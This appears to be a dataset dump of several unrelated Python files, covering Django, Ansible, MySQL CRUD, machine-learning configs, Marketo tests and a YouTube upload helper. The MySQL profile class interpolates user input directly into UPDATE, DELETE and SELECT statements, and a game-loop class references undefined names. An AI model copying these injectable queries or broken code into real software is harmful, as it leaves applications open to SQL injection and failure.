from django.contrib.auth.models import User
# Create your models here.
class Product(models.Model):
title = models.CharField(max_length=255)
pub_date = models.DateTimeField()
url = models.TextField()
image = models.ImageField(upload_to='images/')
hunter = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def summary(self):
return self.title[:100]
def pub_date_pretty(self):
return self.pub_date.strftime('%b %e %Y') | StarcoderdataPython |
5092145 | <filename>venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/plugins/module_utils/failover.py
# -*- coding: utf-8 -*-
# Copyright (c), <NAME> <<EMAIL>>, 2019
# Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import json
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible_collections.community.hrobot.plugins.module_utils.robot import (
BASE_URL,
fetch_url_json,
)
def get_failover_record(module, ip):
'''
Get information record of failover IP.
See https://robot.your-server.de/doc/webservice/en.html#get-failover-failover-ip
'''
url = "{0}/failover/{1}".format(BASE_URL, ip)
result, error = fetch_url_json(module, url)
if 'failover' not in result:
module.fail_json(msg='Cannot interpret result: {0}'.format(json.dumps(result, sort_keys=True)))
return result['failover']
def get_failover(module, ip):
'''
Get current routing target of failover IP.
The value ``None`` represents unrouted.
See https://robot.your-server.de/doc/webservice/en.html#get-failover-failover-ip
'''
return get_failover_record(module, ip)['active_server_ip']
def set_failover(module, ip, value, timeout=180):
'''
Set current routing target of failover IP.
Return a pair ``(value, changed)``. The value ``None`` for ``value`` represents unrouted.
See https://robot.your-server.de/doc/webservice/en.html#post-failover-failover-ip
and https://robot.your-server.de/doc/webservice/en.html#delete-failover-failover-ip
'''
url = "{0}/failover/{1}".format(BASE_URL, ip)
if value is None:
result, error = fetch_url_json(
module,
url,
method='DELETE',
timeout=timeout,
accept_errors=['FAILOVER_ALREADY_ROUTED']
)
else:
headers = {"Content-type": "application/x-www-form-urlencoded"}
data = dict(
active_server_ip=value,
)
result, error = fetch_url_json(
module,
url,
method='POST',
timeout=timeout,
data=urlencode(data),
headers=headers,
accept_errors=['FAILOVER_ALREADY_ROUTED']
)
if error is not None:
return value, False
else:
return result['failover']['active_server_ip'], True
def get_failover_state(value):
'''
Create result dictionary for failover IP's value.
The value ``None`` represents unrouted.
'''
return dict(
value=value,
state='routed' if value else 'unrouted'
)
| StarcoderdataPython |
4836785 | from connect_Db import Connect_db
import mysql.connector
from termcolor import colored
from prettytable import PrettyTable
from Validation import Validations
from os import system
class Tb_profil:
Valid = Validations()
conn = Connect_db()
#method untuk menampilkan data, dimana pada method ini mempunyai 1 argument yaitu noid
#mtujuannya adalah karena method ini akan dipakai untuk menampilkan data secara keseluruhan
#(jika noid = 1) dan dipakai menampilkan data berdasarkan id (jika noid != 1)
#nilai 1 ini didpat dari inputan pada method show_menu() di class main()
def show_Profil(self, noid):
#self.mydb adalah sebuah object untuk menampung hasil dari object conn di method con
#karena conn adalah sebuah variabel class, maka untuk memanggil di method menggunakan self
self.Mydb = self.conn.con()
#cursor() ini adalah sebuah method dari modul myql.conecctor dimana fungsinya adalah
# sebagai eksekusi ke database
self.cursor = self.Mydb.cursor()
if(noid == 1):
#quey untuk menampilkan data secara keseluruhan
sql = "SELECT * FROM profil"
print("Tampil Profil")
print("**************")
else:
#quey untuk menampilkan data berdasarkan id
sql = "SELECT * FROM profil WHERE id ={} LIMIT 1".format(noid)
print("Tampil Profil No Id : {}".format(noid))
print("**************")
try:
self.cursor.execute(sql)
#PrettyTable adalah modul dari prettytable dimana tujuannya untuk
#mempercantik tampilan agar lebih rapih
t = PrettyTable(['No Id','Nama', 'Alamat', 'Jenis Kelamin'])
#menampilkan data menggunakan perulangan for
for (no_id,nama, alamat, jenis_kelamin) in self.cursor:
t.add_row([no_id,nama, alamat, jenis_kelamin])
print(t)
except mysql.connector.ProgrammingError as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
exit()
except mysql.connector.Error as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
exit()
#jika tidak ada error/query berhasil, maka cursor dan koneksi ke database akan di tutup.
finally:
self.cursor.close()
self.Mydb.close()
#method ini berfungsi untuk insert data ke database
def insert_Profil(self):
self.Mydb = self.conn.con()
self.cursor = self.Mydb.cursor()
print("Tambah Profil")
print("**************")
#langkah pertama adalah membuat variabel nama/alamat/jenis_kelamin untuk menampung hasil dari
#method self.Valid.validation_String/elf.Valid.validation_StringOption
self.nama = self.Valid.validation_String("Nama : ",True)
self.alamat = self.Valid.validation_String("Alamat : ", True)
self.jenis_kelamin = self.Valid.validation_StringOption("Jenis Kelamin [L/P] : ", True, "L","P")
system("cls")
#kemudian semua variabel tersebut dimasukan kedalam query database untuk insert data
sql = ("INSERT INTO profil "
"(nama, alamat, jenis_kelamin) "
"VALUES (%s, %s, %s)")
values = (self.nama, self.alamat, self.jenis_kelamin)
try:
#menggunakan try, akan dicoba untuk mengeksekusi query tersebut
#ekseskusi query menggunakan self.cursor.execute
self.cursor.execute(sql, values)
#eksekusi ke databse/insert data
self.Mydb.commit()
#jika berhasil akan menampilkan sebuah pesan
print(colored("\n{} Record has been successfully inserted".format(self.cursor.rowcount),"green"))
#jika ada error pada try akan di tanggkap terserbut menggunakan except
except (mysql.connector.IntegrityError, mysql.connector.DataError) as err:
print (colored("Class Tb_profil -> Insert failed in atribute class Tb_profil, typo or incomplete -> {}".format(err),"red"))
#jika error maka query tadi akan dikembalikan seperti sebelumnya/dibatalkan menggunakan rollback
self.Mydb.rollback()
exit()
except mysql.connector.ProgrammingError as err:
print (colored("Class Tb_profil -> Insert failed in values, typo or incomplete -> {}".format(err),"red"))
self.Mydb.rollback()
exit()
except mysql.connector.Error as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))# error message
self.Mydb.rollback()
exit()
#jika tidak ada error/query berhasil, maka cursor dan koneksi ke database akan di tutup.
finally:
self.cursor.close()
self.Mydb.close()
#program untuk mencari id, karena untk mengedit atau menghapus data dibutuhkan sebuah identitas
#yang akan dijadikan sebagai ciri bahwa data ke n yang akan di edit/dihapus
#untuk method ini sama halnya seprti pada method login
def search_Id(self):
while True:
self.Mydb = self.conn.con()
self.cursor = self.Mydb.cursor()
self.id = self.Valid.validation_Int("No Id : ", True)
sql = "SELECT id FROM profil WHERE id = {}".format(self.id )
try:
self.cursor.execute(sql)
for i in self.cursor:
i
if(self.cursor.rowcount < 1):
print("No id tidak ditemukan")
else:
system("cls")
return self.id
except mysql.connector.ProgrammingError as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
exit()
except mysql.connector.Error as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
exit()
#jika tidak ada error/query berhasil, maka cursor dan koneksi ke database akan di tutup.
finally:
self.cursor.close()
self.Mydb.close()
#method untuk mengedit profil
def edit_Profil(self):
#memanggil method search_id, kemudian hasilnya akan di simpan didalam variabel self.id
self.id = self.search_Id()
#self.id ini akan digunanakn sebagai argumen pada method show_profil
self.show_Profil(self.id)
print("\nEdit profil : {}".format(self.id))
print("**************")
self.Mydb = self.conn.con()
self.cursor = self.Mydb.cursor()
self.nama = self.Valid.validation_String("Nama : ",True)
self.alamat = self.Valid.validation_String("Alamat : ", True)
self.jenis_kelamin = self.Valid.validation_StringOption("Jenis Kelamin [L/P] : ", True, "L","P")
system("cls")
#query untuk update data
sql = ("UPDATE profil SET nama='%s', alamat='%s', jenis_kelamin='%s' WHERE id ='%s'" % (self.nama, self.alamat, self.jenis_kelamin, self.id))
try:
self.cursor.execute(sql)
self.Mydb.commit()
print(colored("\n{} Record has been successfully Update".format(self.cursor.rowcount),"green"))
except (mysql.connector.IntegrityError, mysql.connector.DataError) as err:
print (colored("Class Tb_profil -> Update failed in atribute class Tb_profil, typo or incomplete -> {}".format(err),"red"))
self.Mydb.rollback()
exit()
except mysql.connector.ProgrammingError as err:
print (colored("Class Tb_profil -> Update failed in values, typo or incomplete -> {}".format(err),"red"))
self.Mydb.rollback()
exit()
except mysql.connector.Error as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))# error message
self.Mydb.rollback()
exit()
#jika tidak ada error/query berhasil, maka cursor dan koneksi ke database akan di tutup.
finally:
self.cursor.close()
self.Mydb.close()
#method untuk menghapus data tertentu, sama halnya seprti method insert data, perbedannya hanya
# terletak pada querynya saja
def delete_Profil(self):
self.id = self.search_Id()
self.show_Profil(self.id)
print("\nDelete profil")
print("**************")
self.confirm = self.Valid.validation_ConfirmDelete("Apakah yakin ingin menghapus No id {}? [Y/T] : ".format(self.id), True, "Y", "T")
if (self.confirm == "Y"):
self.Mydb = self.conn.con()
self.cursor = self.Mydb.cursor()
sql = ("DELETE FROM profil WHERE id = '%s'" % (self.id))
try:
self.cursor.execute(sql)
self.Mydb.commit()
print(colored("\n{} Record has been successfully Delete".format(self.cursor.rowcount),"green"))
except (mysql.connector.IntegrityError, mysql.connector.DataError) as err:
print (colored("Class Tb_profil -> Delete failed in atribute class Tb_profil, typo or incomplete -> {}".format(err),"red"))
self.Mydb.rollback()
exit()
except mysql.connector.ProgrammingError as err:
print (colored("Class Tb_profil -> Delete failed in values, typo or incomplete -> {}".format(err),"red"))
self.Mydb.rollback()
exit()
except mysql.connector.Error as err:
print (colored("Class Tb_profil -> {}".format(err.msg),"red"))# error message
self.Mydb.rollback()
exit()
#jika tidak ada error/query berhasil, maka cursor dan koneksi ke database akan di tutup.
finally:
self.cursor.close()
self.Mydb.close()
else:
print("No id {} tidak di hapus".format(self.id)) | StarcoderdataPython |
8125162 | import numpy as np
from ._single_layer_model import SingleLayerModel
from ._classifier import Classifier
from . import _functions
class LogisticRegression(SingleLayerModel, Classifier):
'''
Implements logistic regression for classification.
'''
def __init__(self, input_size, output_size, reg_param=0):
# Initialize base class
super(LogisticRegression, self).__init__(input_size, output_size, reg_param)
# Choose output activation function
if(output_size == 1):
# For binary classification
self._afunc = _functions.sigmoid
self._afunc_prime = _functions.sigmoid_prime
else:
# For multiclass classification
self._afunc = _functions.softmax
self._afunc_prime = _functions.softmax_prime
@property
def _activ_func(self):
return self._afunc
@property
def _activ_func_prime(self):
return self._afunc_prime
@property
def _cost_func(self):
return _functions.cross_entropy
@property
def _cost_func_prime(self):
return _functions.cross_entropy_prime | StarcoderdataPython |
11210717 | class OECS(object):
def __init__(self, window, view, state_loader, entity_manager, system_manager, input_manager, asset_manager):
"""
@param window The SFML window object that the state is to be loaded onto.
@param view This is SFML's View object and allows us to zoom in on the what would be shown in the window. This
essentially just gives us the option to zoom in on the stuff visible for a certain state (can be specified in xml data.)
@param state_loader The loader for loading the next state's entities, systems, inputs and assets.
@param entity_manager This is for loading entities into the game based on the state being switched to.
@param system_manager This is for manipulating the systems that are to be executed.
@param input_manager This is for manipulating what inputs are listened for and how they interact with systems and entities.
@param asset_manager This contains the assets that are to be used by SFML's renderer."""
self._window = window
self._view = view
self._state_loader = state_loader
self._entity_manager = entity_manager
self._self._system_manager = system_manager
self._input_manager = input_manager
self._asset_manager = asset_manager
self._last_key_press_timer = sf.Clock()
#This will be False if the player clicks outside of the program's window and "pause" the program
self._is_window_active = True
self._is_quit = False
def close(self):
self._window.close()
def is_quit(self):
return self._is_quit
def process_inputs(self):
#This will loop through all of the events that have been triggered by player input
for event in self._window.iter_events():
if event.type == sf.Event.MOUSE_MOVED:
self._input_manager.mouse_has_moved(self._window.convert_coords(event.x,event.y))
#elif event.type == sf.Event.TEXT_ENTERED:
#InputManager.key_input(event.unicode, True, self._last_key_press_timer.elapsed_time)
#This restarts the Timer for the self._last_key_press_timer since a new key just
# got pressed.
#self._last_key_press_timer.restart()
elif event.type == sf.Event.KEY_PRESSED:
self._input_manager.key_input(event.code, True, self._last_key_press_timer.elapsed_time)
#This restarts the Timer for the self._last_key_press_timer since a new key just
# got pressed.
self._last_key_press_timer.restart()
elif event.type == sf.Event.KEY_RELEASED:
#The time elapsed isn't necessary for the released key.
self._input_manager.key_input(event.code)
elif event.type == sf.Event.MOUSE_BUTTON_PRESSED:
self._input_manager.mouse_input(event.button, True)
elif event.type == sf.Event.MOUSE_BUTTON_RELEASED:
self._input_manager.mouse_input(event.button,False)
elif event.type == sf.Event.CLOSED:
for stateIndx in range(len(lNextState)):
lNextState[stateIndx] = "QUIT"
self._is_quit = True
elif event.type == sf.Event.LOST_FOCUS:
self._is_window_active = False
elif event.type == sf.Event.GAINED_FOCUS:
self._is_window_active = True
def update_frame(self, time_change):
#This makes the program so that it basically pauses all of its game updates when a user clicks outside of the window. And it waits until the user clicks on the window.
if self._is_window_active:
#We don't want to change lNextState if the game has been set to QUIT
if not self._is_quit:
#lNextState will contain "NULL"s when no state change is signaled
#lNextState will have all of its elements change when switching to a new state.
lNextState = self._entity_manager.input_update()
#Check to see if we have signaled to quit the game thus far
if lNextState[0] == "QUIT":
self._is_quit = True
#If one of the lNextState elements is changed, they all are (just how it goes.)
if lNextState[0] != "NULL" and lNextState[0] != "QUIT":
# TODO Change to self._state_loader.load_state()
ChangeState(lCurrentState, lNextState, window, view, entity_manager)
#Finally after we've handled input and have correctly adjusted to the nextState (in most cases it won't happen,)
#we can then update our game's model with stuff that will happen in the respective state with each game update.
lNextState = self._entity_manager.logic_update(time_change)
#Check to see if we have signaled to quit the game thus far
if lNextState[0] == "QUIT":
self._is_quit = True
#If one of the lNextState elements is changed, they all are (just how it goes.)
if lNextState[0] != "NULL" and lNextState[0] != "QUIT":
# TODO Change to self._state_loader.load_state()
ChangeState(lCurrentState, lNextState, window, view, entity_manager)
def render_frame(self):
#This makes the program so that it basically pauses all of its game updates when a user clicks outside of the window. And it waits until the user clicks on the window.
if self._is_window_active:
self._entity_manager.render_update(self._window, self._view)
self._window.display() | StarcoderdataPython |
388372 | #-*-coding:utf8-*-
import copy, os
from gen_conf_file import *
from dataset_cfg import *
def gen_nbp_lstm(d_mem, init, lr, dataset, l2, max_norm2, negative_num):
net = {}
ds = DatasetCfg(dataset)
g_filler = gen_uniform_filter_setting(init)
zero_filler = gen_zero_filter_setting()
g_updater = gen_sgd_setting(lr=lr, l2=l2, batch_size=ds.train_batch_size)
zero_l2_updater = gen_sgd_setting(lr=lr, batch_size=ds.train_batch_size)
g_layer_setting = {}
g_layer_setting['no_bias'] = True
net['net_name'] = 'nbp_lstm'
net['need_reshape'] = False
net_cfg_train, net_cfg_valid, net_cfg_test = {}, {}, {}
net['net_config'] = [net_cfg_train, net_cfg_valid, net_cfg_test]
net_cfg_train["tag"] = "Train"
net_cfg_train["max_iters"] = ds.train_max_iters
net_cfg_train["display_interval"] = ds.train_display_interval
net_cfg_train["out_nodes"] = ['loss','acc']
net_cfg_valid["tag"] = "Valid"
net_cfg_valid["max_iters"] = ds.valid_max_iters
net_cfg_valid["display_interval"] = ds.valid_display_interval
net_cfg_valid["out_nodes"] = ['acc']
net_cfg_test["tag"] = "Test"
net_cfg_test["max_iters"] = ds.test_max_iters
net_cfg_test["display_interval"] = ds.test_display_interval
net_cfg_test["out_nodes"] = ['acc']
layers = []
net['layers'] = layers
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['u', 'c', 'c_len', 'y', 'ys' ]
layer['layer_name'] = 'train_data'
layer['layer_type'] = 73
layer['tag'] = ['Train']
setting = {}
layer['setting'] = setting
setting['batch_size'] = ds.train_batch_size
setting['data_file'] = ds.train_data_file
setting['max_session_len'] = ds.max_session_len
setting['max_context_len'] = ds.max_context_len
setting['train_or_pred'] = "train"
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['u', 'c', 'c_len', 'y', 'ys' ]
layer['layer_name'] = 'valid_data'
layer['layer_type'] = 73
layer['tag'] = ['Valid']
setting = {}
layer['setting'] = setting
setting['batch_size'] = ds.train_batch_size
setting['data_file'] = ds.valid_data_file
setting['max_session_len'] = ds.max_session_len
setting['max_context_len'] = ds.max_context_len
setting['train_or_pred'] = "pred"
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['u', 'c', 'c_len', 'y', 'ys' ]
layer['layer_name'] = 'test_data'
layer['layer_type'] = 73
layer['tag'] = ['Test']
setting = {}
layer['setting'] = setting
setting['batch_size'] = ds.train_batch_size
setting['data_file'] = ds.test_data_file
setting['max_session_len'] = ds.max_session_len
setting['max_context_len'] = ds.max_context_len
setting['train_or_pred'] = "pred"
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['u']
layer['top_nodes'] = ['u_rep']
layer['layer_name'] = 'user_embedding'
layer['layer_type'] = 21
setting = {}
layer['setting'] = setting
setting['feat_size'] = ds.d_user_rep
setting['word_count'] = ds.num_user
setting['w_updater'] = zero_l2_updater
setting['w_filler'] = g_filler
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['c']
layer['top_nodes'] = ['c_rep']
layer['layer_name'] = 'item_embedding'
layer['layer_type'] = 21
setting = {}
layer['setting'] = setting
setting['feat_size'] = ds.d_item_rep
setting['word_count'] = ds.num_item
setting['w_updater'] = zero_l2_updater
setting['w_filler'] = g_filler
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['c_rep']
layer['top_nodes'] = ['c_rep_ave']
layer['layer_name'] = 'session_ave_pool'
layer['layer_type'] = 25
setting = {'pool_type':'ave'}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['c_rep_ave', 'c_len']
layer['top_nodes'] = ['c_rep_lstm_input']
layer['layer_name'] = 'gen_lstm_input'
layer['layer_type'] = 48
layer['setting'] = {}
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['c_rep_lstm_input']
layer['top_nodes'] = ['lstm_rep']
layer['layer_name'] = 'lstm'
layer['layer_type'] = 24
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['d_mem'] = d_mem
setting['grad_norm2'] = 1000
setting['max_norm2'] = max_norm2
setting['grad_cut_off'] = 500
setting['reverse'] = False
setting['w_filler'] = g_filler
setting['u_filler'] = g_filler
setting['b_filler'] = zero_filler
setting['w_updater'] = g_updater
setting['u_updater'] = g_updater
setting['b_updater'] = g_updater
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['lstm_rep']
layer['top_nodes'] = ['lstm_rep_last']
layer['layer_name'] = 'last_pool'
layer['layer_type'] = 25
setting = {'pool_type':'last'}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['lstm_rep_last', 'u_rep']
layer['top_nodes'] = ['pred_rep']
layer['layer_name'] = 'concat'
layer['layer_type'] = 18
setting = {'bottom_node_num':2, 'concat_dim_index':3}
layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['pred_rep']
# layer['top_nodes'] = ['hidden_rep_linear']
# layer['layer_name'] = 'transform'
# layer['layer_type'] = 11
# setting = copy.deepcopy(g_layer_setting)
# layer['setting'] = setting
# setting['num_hidden'] = n_hidden
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['hidden_rep_linear']
# layer['top_nodes'] = ['hidden_rep_nonlinear']
# layer['layer_name'] = 'activation'
# layer['layer_type'] = 1 # relu 1 sigmoide 2 tanh 3
# setting = {"phrase_type":2}
# layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['pred_rep']
layer['top_nodes'] = ['drop_rep']
layer['layer_name'] = 'dropout'
layer['layer_type'] = 13
setting = {'rate':0}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['drop_rep']
layer['top_nodes'] = ['softmax_ret']
layer['layer_name'] = 'softmax_fullconnect'
layer['layer_type'] = 11
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['num_hidden'] = ds.num_item
setting['w_filler'] = zero_filler
setting['b_filler'] = zero_filler
setting['w_updater'] = zero_l2_updater
setting['b_updater'] = zero_l2_updater
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_ret', 'y']
layer['top_nodes'] = ['loss']
layer['layer_name'] = 'softmax_activation'
layer['layer_type'] = 51
layer['setting'] = {}
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_ret', 'ys']
layer['top_nodes'] = ['acc']
layer['layer_name'] = 'accuracy'
layer['layer_type'] = 56
setting = {'topk':5}
layer['setting'] = setting
return net
run = 5
# l2 = 0.
for dataset in ['tf']:
for d_mem in [30]:
idx = 0
for init in [0.3, 0.1]:
# for lr in [0.1, 0.03, 0.01, 0.003]:
for lr in [0.3, 0.1, 0.03]:
# for negative_num in [0]:
for max_norm2 in [10, 1, 0.1]:
for l2 in [0.0]:
lstm_norm2 = 1000
net = gen_nbp_lstm(d_mem=d_mem, init=init, lr=lr, dataset=dataset, l2=l2, \
max_norm2=max_norm2, negative_num=0)
net['log'] = 'log.nbp_lstm.{0}.d{1}.run{2}.{3}'.format \
(dataset, str(d_mem), str(run), str(idx))
# net["save_model"] = {"file_prefix": "./model/model."+str(idx),"save_interval": 5000}
# net["save_activation"] = [{"tag":"Valid","file_prefix": \
# "./model/valid."+str(idx), \
# "save_interval": 5000, \
# "save_nodes":["x","y","lstm_seq","word_rep_seq"], \
# "save_iter_num":1}]
gen_conf_file(net, '/home/wsx/exp/nbp/{0}/run.{1}/'.format(dataset, str(run)) + \
'model.nbp_lstm.{0}.d{1}.run{2}.{3}'.format \
(dataset, str(d_mem), str(run), str(idx)))
# gen_conf_file(net, '/home/wsx/exp/match/test/'.format(dataset, str(run)) + \
# 'model.lm_lstm_autoencoder.{0}.d{1}.run{2}.{3}'.format \
# (dataset, str(d_mem), str(run), str(idx)))
idx += 1
| StarcoderdataPython |
4887390 | import os
import errno
from cse.util import PackerUtil
from bisect import bisect_left
class DocumentMap(object):
def __init__(self, document_map_index, document_map_dict):
if not os.path.exists(os.path.dirname(document_map_index)):
try:
os.makedirs(os.path.dirname(document_map_index))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
self.document_map_index_path = document_map_index
self.document_map_dict_path = document_map_dict
self.__index = None
self.__dict = None
def open(self):
if os.path.exists(self.document_map_index_path):
self.__index = open(self.document_map_index_path, 'r')
else:
print(self.__class__.__name__ + ":", "No DocumentMap available...Please start indexer.")
raise FileNotFoundError
if os.path.exists(self.document_map_dict_path):
self.__dict = PackerUtil.unpackFromFile(self.document_map_dict_path, type=PackerUtil.PICKLE)
else:
print(self.__class__.__name__ + ":", "No DocumentMap Dictionary available...Please start indexer.")
raise FileNotFoundError
return self
def close(self):
self.__index.close()
def insert(self, cid, pointer):
raise DeprecationWarning
def get(self, cid):
pos = self.__get_dict_pos(cid, self.__dict[0])
snippet = self.__get_index_snippet(pos)
pos = self.__get_dict_pos(cid, snippet[0])
if not snippet[0][pos] == int(cid):
raise FileNotFoundError("DocumentMap doesn't contain cid: {}".format(cid))
return snippet[1][pos]
def __get_dict_pos(self, cid, list):
pos = bisect_left(list, int(cid))
if len(list) == pos:
return pos - 1
if list[pos] == int(cid):
return pos
return pos - 1
def __get_index_snippet(self, start_pos):
snippet = ([], [])
start_offset = self.__dict[1][start_pos]
try:
length = self.__dict[1][start_pos + 1] - self.__dict[1][start_pos]
except IndexError:
length = -1
self.__index.seek(start_offset)
text = self.__index.read(length)
text = text.strip().split('\n')
for line in text:
cid, pointer = line.split(',')
snippet[0].append(int(cid))
snippet[1].append(int(pointer))
return snippet
def listCids(self):
cids = []
self.__index.seek(0)
for line in self.__index:
cids.append(int(line.split(',')[0]))
return cids
def __enter__(self):
return self.open()
def __exit__(self, type, value, traceback):
self.close()
| StarcoderdataPython |
1651190 | responses.mock.assert_all_requests_are_fired = True
class MarketoApi(unittest.TestCase):
@responses.activate
def test_auth(self):
marketo_auth_url = "".join(["https://066-eov-335.mktorest.com/", "identity/oauth/token?", "grant_type=client_credentials&client_id=123", "&client_secret=321"])
marketo_auth_payload = {"access_token": "test"}
responses.add(responses.GET, marketo_auth_url, json=marketo_auth_payload, status=200)
marketo_leads_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
marketo_leads_payload = {"result": [{"id": "test"}]}
responses.add(responses.GET, marketo_leads_url, json=marketo_leads_payload, status=200)
os.environ["MARKETO_CLIENT_ID"] = "fake_id"
os.environ["MARKETO_CLIENT_SECRET"] = "fake_secret"
marketo = marketo_api.MarketoApi()
user = marketo.get_user("<EMAIL>")
self.assertEqual(user, {"id": "test"})
@responses.activate
def test_get_user(self):
marketo_leads_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
marketo_leads_payload = {"result": [{"id": "test"}]}
responses.add(responses.GET, marketo_leads_url, json=marketo_leads_payload, status=200)
marketo = marketo_api.MarketoApi()
marketo.token = "<PASSWORD>"
user = marketo.get_user("<EMAIL>")
self.assertEqual(user, {"id": "test"})
@responses.activate
def test_get_newsletter_subscription(self):
marketo_lead_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/lead/test.json?", "access_token=test&fields=id,email,snapcraftnewsletter"])
marketo_lead_payload = {"result": [{"snapcraftnewsletter": True}]}
responses.add(responses.GET, marketo_lead_url, json=marketo_lead_payload, status=200)
marketo = marketo_api.MarketoApi()
marketo.token = "<PASSWORD>"
subscription = marketo.get_newsletter_subscription("test")
self.assertEqual(subscription, {"snapcraftnewsletter": True})
@responses.activate
def test_get_newsletter_subscription_bad_response(self):
marketo_lead_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/lead/test.json?", "access_token=test&fields=id,email,snapcraftnewsletter"])
marketo_lead_payload = {"badkey": "bad"}
responses.add(responses.GET, marketo_lead_url, json=marketo_lead_payload, status=200)
marketo = marketo_api.MarketoApi()
marketo.token = "<PASSWORD>"
subscription = marketo.get_newsletter_subscription("test")
self.assertEqual(subscription, {})
@responses.activate
def test_set_newsletter_subscription(self):
marketo_set_subscription_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
responses.add(responses.POST, marketo_set_subscription_url, json={}, status=200)
marketo = marketo_api.MarketoApi()
marketo.token = "<PASSWORD>"
response = marketo.set_newsletter_subscription("test", True)
self.assertEqual(response, {})
@responses.activate
def test_token_refresh(self):
marketo_leads_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
marketo_leads_payload = {"result": [{"id": "test"}]}
responses.add(responses.GET, marketo_leads_url, status=602)
marketo_auth_url = "".join(["https://066-eov-335.mktorest.com/", "identity/oauth/token?", "grant_type=client_credentials&client_id=123", "&client_secret=321"])
marketo_auth_payload = {"access_token": "<PASSWORD>"}
responses.add(responses.GET, marketo_auth_url, json=marketo_auth_payload, status=200)
responses.add(responses.GET, marketo_leads_url, json=marketo_leads_payload, status=200)
marketo = marketo_api.MarketoApi()
marketo.token = "<PASSWORD>"
marketo.get_user("<EMAIL>")
self.assertEqual(marketo.token, "refreshed_token") | StarcoderdataPython |
4954327 | <reponame>LocalghostFI/MuurameAllsky
#!/usr/bin/python
import http.client
import httplib2
import os
import random
import sys
import time
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient.http import MediaFileUpload
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# Explicitly tell the underlying HTTP transport library not to retry, since
# we are handling retry logic ourselves.
httplib2.RETRIES = 1
# Maximum number of times to retry before giving up.
MAX_RETRIES = 10
# Always retry when these exceptions are raised.
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, http.client.NotConnected,
http.client.IncompleteRead, http.client.ImproperConnectionState,
http.client.CannotSendRequest, http.client.CannotSendHeader,
http.client.ResponseNotReady, http.client.BadStatusLine)
# Always retry when an apiclient.errors.HttpError with one of these status
# codes is raised.
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google API Console at
# https://console.developers.google.com/.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "/home/pi/allsky/scripts/client_secret.json"
# This OAuth 2.0 access scope allows an application to upload files to the
# authenticated user's YouTube channel, but doesn't allow other types of access.
YOUTUBE_UPLOAD_SCOPE = "https://www.googleapis.com/auth/youtube.upload"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the API Console
https://console.developers.google.com/
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
VALID_PRIVACY_STATUSES = ("public", "private", "unlisted")
def get_authenticated_service(args):
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
scope=YOUTUBE_UPLOAD_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, storage, args)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
